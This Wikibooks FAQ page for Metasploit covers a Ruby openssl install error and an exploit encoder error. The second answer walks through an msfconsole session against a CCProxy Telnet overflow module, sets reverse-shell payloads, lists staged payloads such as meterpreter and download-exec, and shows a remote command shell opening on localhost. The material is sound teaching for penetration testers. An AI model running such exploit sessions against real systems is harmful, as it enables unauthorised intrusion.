Metasploit/Frequently Asked Questions

From Wikibooks, open books for an open world
< Metasploit
Jump to: navigation, search
Metasploit
FAQs


Installation[edit]

Errors[edit]

no such file to load -- openssl (LoadError)[edit]

Q: When running Metasploit for the first time, I get the error: no such file to load -- openssl (LoadError)

  • Example:
[~/metasploit]# ./msfgui
./lib/rex/socket/ssl_tcp_server.rb:4:in `require': no such file to load -- openssl (LoadError)
        from ./lib/rex/socket/ssl_tcp_server.rb:4
        from ./lib/rex/socket/comm/local.rb:5:in `require'
        from ./lib/rex/socket/comm/local.rb:5
        from ./lib/rex/socket.rb:22:in `require'
        from ./lib/rex/socket.rb:22
        from ./lib/rex.rb:71:in `require'
        from ./lib/rex.rb:71
        from ./msfgui:10:in `require'
        from ./msfgui:10

A: Metasploit requires the Ruby implementation of openssl - not the standard C implementation of openssl used by Apache etc. Install the relevant ruby-openssl library.

  • Example (for Debian - check your OS or try using gem):
pwebster@metasploit:~$ apt-cache search ruby | grep openssl
libopenssl-ruby - OpenSSL interface for Ruby
libopenssl-ruby1.8 - OpenSSL interface for Ruby 1.8
libopenssl-ruby1.9 - OpenSSL interface for Ruby 1.9

pwebster@metasploit:~# apt-get install libopenssl-ruby 

Exploit Modules[edit]

Errors[edit]

Exploit failed: No encoders encoded the buffer successfully[edit]

Q: After setting all the required parameters for an exploit module and running exploit, I receive the following error: [-] Exploit failed: No encoders encoded the buffer successfully.

  • Example:
msf > use windows/proxy/ccproxy_telnet_ping
msf exploit(ccproxy_telnet_ping) > info

       Name: CCProxy <= v6.2 Telnet Proxy Ping Overflow
    Version: $Revision$
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License

Provided by:
  Patrick Webster <patrick [at] aushack.com>

Available targets:
  Id  Name                                 
  --  ----                                 
  0   Windows 2000 Pro SP0 - English       
  1   Windows 2000 Pro SP1 - English       
  2   Windows 2000 Pro SP2 - English       
  3   Windows 2000 Pro SP3 - English       
  4   Windows 2000 Pro SP4 - English       
  5   Windows XP SP0/1 - English           
  6   Windows 2003 Server SP0/1 - English  

Basic options:
  Name   Current Setting  Required  Description         
  ----   ---------------  --------  -----------         
  RHOST  127.0.0.1        yes       The target address  
  RPORT  23               yes       The target port     

Payload information:
  Space: 200
  Avoid: 5 characters

Description:
  This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet 
  service. The stack is overwritten when sending an overly long 
  address to the 'ping' command.

msf exploit(ccproxy_telnet_ping) > set TARGET 4
TARGET => 4
msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell_reverse_tcp 
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ccproxy_telnet_ping) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf exploit(ccproxy_telnet_ping) > check 
[*] The target appears to be vulnerable.
msf exploit(ccproxy_telnet_ping) > exploit 
[-] Exploit failed: No encoders encoded the buffer successfully.

A: The payloads available (show payloads) are determined by the memory 'Space' available for the exploit to use. In the above example, the payload space is: 'Space: 200'. However, the target application does not allow certain characters to be used (usually the null character 0x00 as this denotes the end of a string [character array]). In the example the payload cannot permit five characters: 'Avoid: 5 characters '

When you run the exploit, the payload generators will attempt to fit your desired payload into a space of 200 which excludes 5 specific characters. This is not always possible, and will result in the error: No encoders encoded the buffer successfully.

However, all is not lost. The Metasploit Framework includes the ability to support staged payloads. A staged payload is a significantly smaller payload which, instead of executing your desired action (such as reverse shell), will start a staging platform which can then add to that platform. So in our example, instead of a complete reverse shell, it will:

  1. Create the staging platform.
  2. Allocate enough memory to hold your desired payload.
  3. Obtain the rest of the payload from you.
  4. Execute the payload as a whole.

Generally, all the staged exploits are denoted by the '/' after the desired payload. Some examples are:

   windows/dllinject/reverse_tcp          Windows Inject DLL, Reverse TCP Stager                                                       
   windows/download_exec/bind_tcp         Windows Executable Download and Execute, Bind TCP Stager                                                                     
   windows/exec/find_tag                  Windows Execute Command, Find Tag Ordinal Stager                                                       
   windows/meterpreter/reverse_tcp        Windows Meterpreter, Reverse TCP Stager                              
   windows/shell/reverse_tcp              Windows Command Shell, Reverse TCP Stager                                                     
   windows/upexec/bind_tcp                Windows Upload/Execute, Bind TCP Stager                           
   windows/vncinject/reverse_ord_tcp      Windows VNC Inject, Reverse Ordinal TCP Stager                       

So now that we know it cannot fit an 'Inline' payload, we can use a stager instead:

...
msf exploit(ccproxy_telnet_ping) > exploit 
[-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ccproxy_telnet_ping) > exploit 
[*] Started reverse handler
[*] Trying target Windows 2000 Pro SP4 - English on host 127.0.0.1:23...
[*] Sending stage (474 bytes)
[*] Command shell session 8 opened (127.0.0.1:4444 -> 127.0.0.1:2016)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Documents and Settings\Administrator>